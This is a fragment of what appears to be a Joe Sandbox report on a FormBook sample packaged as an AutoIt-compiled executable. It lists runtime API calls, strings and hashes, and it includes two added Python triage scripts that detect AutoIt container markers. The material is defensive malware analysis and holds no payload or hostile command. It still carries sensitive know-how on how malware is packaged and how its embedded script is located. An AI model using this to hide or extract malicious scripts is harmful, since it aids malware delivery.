                                                                        • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                        • API String ID: 3948761352-1609664196
                                                                        • Opcode ID: 0d20ff72191698bd90ee1a3448f6007b9494b4216ad1560248775c19b8461813
                                                                        • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                        • Opcode Fuzzy Hash: 0d20ff72191698bd90ee1a3448f6007b9494b4216ad1560248775c19b8461813
                                                                        • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
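                                                                         The listings above belong to the AutoIt v3 interpreter stub, not to the script it carries: the marker string referenced at 0042E1C2, the /AutoIt3ExecuteLine, /AutoIt3ExecuteScript, /AutoIt3OutputDebug and /ErrorStdOut switches compared against the command line here, and the HKCU Software\AutoIt v3\AutoIt key opened at 0040E4DD in the next listing are all runtime artifacts. The script below, added here as an example and not part of the Joe Sandbox report or the AutoIt project, turns those strings into a triage check: it searches a file image for them in UTF-16LE (the encoding consumed by the W-suffixed APIs in these listings) and in ASCII, and returns a packaging verdict. The sample buffers are constructed inside the script and the three verdict labels are this example's own convention. The limit matters for triage: a hit says the file is an AutoIt-compiled executable, not what the embedded script does, so it does not by itself identify FormBook or any other payload.

```python
"""
AutoIt-compiled-executable triage based on the runtime strings visible in
this report's disassembly. Added example: not part of the Joe Sandbox report
and not code from the AutoIt project.
"""
from __future__ import annotations

from dataclasses import dataclass
from typing import Iterator

# Indicator strings copied from the report's function listings.
AUTOIT_MARKER = ("This is a compiled AutoIt script. AV researchers please email "
                 "avsupport@autoitscript.com for support.")
AUTOIT_SWITCHES = ("/AutoIt3ExecuteLine", "/AutoIt3ExecuteScript",
                   "/AutoIt3OutputDebug", "/ErrorStdOut")
AUTOIT_REGKEY = r"Software\AutoIt v3\AutoIt"

# The runtime hands these strings to W-suffixed APIs, so in the image they
# are normally UTF-16LE; ASCII is searched too in case a dump was narrowed.
ENCODINGS = ("utf-16-le", "ascii")


@dataclass(frozen=True)
class Hit:
    name: str       # which indicator matched
    offset: int     # byte offset in the scanned buffer
    encoding: str   # encoding the match was found in


def _find_all(buf: bytes, needle: str, name: str) -> Iterator[Hit]:
    """Yield every occurrence of `needle` in `buf`, in each encoding."""
    for enc in ENCODINGS:
        pat = needle.encode(enc)
        pos = buf.find(pat)
        while pos != -1:
            yield Hit(name, pos, enc)
            pos = buf.find(pat, pos + 1)


def scan_autoit_indicators(buf: bytes) -> list[Hit]:
    """Return all AutoIt runtime indicators found in `buf`, ordered by offset."""
    hits = list(_find_all(buf, AUTOIT_MARKER, "marker"))
    for sw in AUTOIT_SWITCHES:
        hits.extend(_find_all(buf, sw, "switch:" + sw))
    hits.extend(_find_all(buf, AUTOIT_REGKEY, "regkey"))
    return sorted(hits, key=lambda h: (h.offset, h.name))


def classify(buf: bytes) -> str:
    """
    Three-way verdict (labels are this example's own convention):
      autoit-compiled       marker string present
      probable-autoit       no marker, but at least two switches plus the key
      no-autoit-indicators  none of the above
    The verdict describes the packaging only; it says nothing about the
    embedded script, which is where a payload such as FormBook would live.
    """
    names = {h.name for h in scan_autoit_indicators(buf)}
    if "marker" in names:
        return "autoit-compiled"
    switches_seen = sum(1 for n in names if n.startswith("switch:"))
    if switches_seen >= 2 and "regkey" in names:
        return "probable-autoit"
    return "no-autoit-indicators"


def build_sample(strings: list[str], encoding: str = "utf-16-le") -> bytes:
    """Constructed stand-in for a PE image: a DOS/PE stub followed by the
    given strings separated by filler. Test data only, not a real binary."""
    blob = b"MZ" + b"\x00" * 62 + b"PE\x00\x00"
    for s in strings:
        blob += b"\x90" * 16 + s.encode(encoding) + b"\x00\x00"
    return blob


# Constructed inputs for the demo run and for the checks.
SAMPLE_AUTOIT = build_sample([AUTOIT_MARKER, *AUTOIT_SWITCHES, AUTOIT_REGKEY])
SAMPLE_SWITCHES_ONLY = build_sample([*AUTOIT_SWITCHES, AUTOIT_REGKEY])
SAMPLE_CLEAN = build_sample(["kernel32.dll", "Hello, world"])


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_AUTOIT
    print(classify(data))
    for hit in scan_autoit_indicators(data):
        print(f"{hit.offset:#010x}  {hit.encoding:<10}  {hit.name}")
```

Run it with a path argument to scan a real file, or without one to scan the constructed sample. The marker alone is decisive because it is emitted by the AutoIt compiler into every compiled script; the switch-plus-key fallback covers images where that string has been patched out but the command-line parser and the settings key lookup remain.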

                                                                        APIs
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                        • __wsplitpath.LIBCMT ref: 0040E41C
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • _wcsncat.LIBCMT ref: 0040E433
                                                                        • __wmakepath.LIBCMT ref: 0040E44F
                                                                          • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                          • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                          • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                        • _wcscpy.LIBCMT ref: 0040E487
                                                                          • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                        • _wcscat.LIBCMT ref: 00427541
                                                                        • _wcslen.LIBCMT ref: 00427551
                                                                        • _wcslen.LIBCMT ref: 00427562
                                                                        • _wcscat.LIBCMT ref: 0042757C
                                                                        • _wcsncpy.LIBCMT ref: 004275BC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                        • String ID: Include$\
                                                                        • API String ID: 3173733714-3429789819
                                                                        • Opcode ID: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                        • Opcode Fuzzy Hash: f7b2e8dd37dad95b873b636539c9fa9ee4ced90e3c163691215c383b9fb11936
                                                                        • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • _fseek.LIBCMT ref: 0045292B
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                          • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                          • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                        • __fread_nolock.LIBCMT ref: 00452961
                                                                        • __fread_nolock.LIBCMT ref: 00452971
                                                                        • __fread_nolock.LIBCMT ref: 0045298A
                                                                        • __fread_nolock.LIBCMT ref: 004529A5
                                                                        • _fseek.LIBCMT ref: 004529BF
                                                                        • _malloc.LIBCMT ref: 004529CA
                                                                        • _malloc.LIBCMT ref: 004529D6
                                                                        • __fread_nolock.LIBCMT ref: 004529E7
                                                                        • _free.LIBCMT ref: 00452A17
                                                                        • _free.LIBCMT ref: 00452A20
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1255752989-0
                                                                        • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                        • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                        • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock$_fseek_wcscpy
                                                                        • String ID: FILE
                                                                        • API String ID: 3888824918-3121273764
                                                                        • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                        • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                        • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                        • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                        • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                        • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                        • ImageList_ReplaceIcon.COMCTL32(00AB14B8,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-1005189915
                                                                        • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                        • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                        • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99

                                                                        Control-flow Graph

                                                                        APIs
                                                                        • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                        • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                        • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                        • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                        • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                        • RegisterClassExW.USER32(?), ref: 0041045D
                                                                          • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00AB14B8,000000FF,00000000), ref: 00410552
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: #$0$AutoIt v3
                                                                        • API String ID: 423443420-4155596026
                                                                        • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                        • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                        • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98

                                                                         Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _malloc
                                                                        • String ID: Default
                                                                        • API String ID: 1579825452-753088835
                                                                        • Opcode ID: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                                        • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                        • Opcode Fuzzy Hash: ad9c003b1f2fa77121fbfcba884144bd1a02cdd9abf6dd606c80e641f461d2b6
                                                                        • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B

                                                                        Control-flow Graph

                                                                         Control-flow graph (rendered graph not preserved; edge list condensed): entry block 0x40f5c0; basic blocks 0x40f5c0-0x40f6df plus a second range at 0x425d05-0x425d5f; a self-loop at 0x40f5d0-0x40f5e8 and back-edges to 0x40f614 and 0x40f640; calls to 0x422240, 0x413650, 0x410e60, 0x414d04 (twice), 0x4150d1 (twice) and 0x414d30.
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_fseek_memmove_strcat
                                                                        • String ID: AU3!$EA06
                                                                        • API String ID: 1268643489-2658333250
                                                                        • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                        • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                        • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
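The records above that read a file with _fseek/__fread_nolock and compare against the strings "AU3!", "EA06" and "FILE", together with the "AutoIt v3 GUI" window class, the TaskbarCreated message registration and the HKCU\Software\AutoIt v3\AutoIt key opened by 0040E4C0, are the AutoIt v3 runtime's compiled-script loader: this FormBook sample is an AutoIt-compiled executable, and the script it runs sits in a container whose header is "AU3!" followed by the format tag "EA06", with a "FILE" tag in front of each embedded entry. The Python below is an added triage check written for this report; it is not code from Joe Sandbox, from the sample or from AutoIt. It finds that marker in a file, says whether the marker lies inside a PE section or in the overlay appended after the last section, and lists the "FILE" tags that follow it. The 16-byte magic preceding "AU3!", the older "EA05" tag and the minimal PE used as sample input are assumptions taken from public AutoIt extraction tooling, not facts shown in the report.

```python
"""Triage check for an AutoIt v3 compiled-script container inside a PE.

Added example for this report; not Joe Sandbox's, the sample's or AutoIt's
own code.  It looks for the "AU3!" + "EA06" marker and the per-entry "FILE"
tags that the loader functions in the report compare against, and reports
whether the marker lies in a PE section or in the overlay appended after
the last section.  Items marked ASSUMPTION come from public AutoIt
extraction tooling, not from the report itself.
"""
import re
import struct

# Marker strings from the report: "AU3!" followed by the format tag "EA06".
# ASSUMPTION: "EA05" is the tag used by older AutoIt builds.
AU3_MARKER_RE = re.compile(rb"AU3!EA0[56]")
# ASSUMPTION: 16-byte magic that precedes "AU3!EA06" in compiled scripts.
A3X_MAGIC = bytes.fromhex("A3484BBE986C4AA9994C530A86D6487D")
FILE_TAG = b"FILE"          # per-entry tag seen in the report's strings


def pe_sections(data: bytes) -> list:
    """Return [(name, raw_offset, raw_size)] from the PE section table,
    or [] when the buffer does not parse as a PE image."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return []
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if e_lfanew + 24 > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return []
    num_sections = struct.unpack_from("<H", data, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", data, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # section table follows the optional header
    sections = []
    for i in range(num_sections):
        off = table + i * 40                   # IMAGE_SECTION_HEADER is 40 bytes
        if off + 40 > len(data):
            break
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        raw_size, raw_ptr = struct.unpack_from("<II", data, off + 16)
        sections.append((name, raw_ptr, raw_size))
    return sections


def locate(offset: int, sections: list) -> str:
    """Classify a file offset as header, section <name> or overlay."""
    if not sections:
        return "raw buffer (not a PE)"
    for name, ptr, size in sections:
        if ptr <= offset < ptr + size:
            return f"section {name}"
    end_of_sections = max(ptr + size for _, ptr, size in sections)
    return "overlay" if offset >= end_of_sections else "header"


def scan_autoit(data: bytes) -> dict:
    """Find AutoIt compiled-script markers and the FILE tags after them."""
    sections = pe_sections(data)
    result = {"is_pe": bool(sections), "markers": []}
    for m in AU3_MARKER_RE.finditer(data):
        start = m.start()
        has_magic = start >= 16 and data[start - 16:start] == A3X_MAGIC
        # Only the first FILE tag after the marker is certainly an entry
        # header; later hits may be chance bytes inside obfuscated entries.
        tags = [m.end() + t.start()
                for t in re.finditer(re.escape(FILE_TAG), data[m.end():])]
        result["markers"].append({
            "offset": start,
            "format": m.group()[4:].decode("ascii"),
            "a3x_magic": has_magic,
            "location": locate(start, sections),
            "file_tags": tags,
        })
    return result


def build_sample() -> bytes:
    """Constructed test input: a minimal one-section PE with an AutoIt-style
    blob appended as overlay.  Not a real sample."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    # PE\0\0, Machine=i386, 1 section, stamps/symbols zero, no optional header
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0, 0x102)
    text_ptr, text_size = 0x200, 0x200
    section = (b".text\0\0\0"
               + struct.pack("<IIII", 0x200, 0x1000, text_size, text_ptr)
               + b"\0" * 16)
    head = dos + coff + section
    image = head + b"\0" * (text_ptr - len(head)) + b"\xCC" * text_size
    blob = (A3X_MAGIC + b"AU3!EA06"
            + FILE_TAG + b"\x10" * 40      # constructed entry 1
            + FILE_TAG + b"\x20" * 40)     # constructed entry 2
    return image + blob


if __name__ == "__main__":
    import json
    import sys
    buf = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(json.dumps(scan_autoit(buf), indent=2))
```

Run it with the sample path as the only argument; without an argument it scans the constructed PE. A hit means the next step is a dedicated AutoIt script extractor, since the bytes after each FILE tag are obfuscated in the compiled format and this check only locates them; more than one FILE tag after the marker means the stub carries extra embedded files beside the script.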

                                                                        Control-flow Graph

                                                                         Control-flow graph (rendered graph not preserved; edge list condensed): entry block 0x401100, a window procedure that falls through to DefWindowProcW for unhandled messages; basic blocks 0x401100-0x401225 plus a second range at 0x42afb4-0x42b06d; KillTimer/PostQuitMessage on one path and SetTimer/RegisterWindowMessageW/CreatePopupMenu on another; calls to 0x401250, 0x40f190 (twice), 0x401000 (twice), 0x40e0c0, 0x468b0e, 0x401a50, 0x4370f4 and 0x45fd57.
                                                                        APIs
                                                                        • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                        • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                        • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                        • CreatePopupMenu.USER32 ref: 00401204
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                         • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                         • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                                                                        • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                                                                        • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
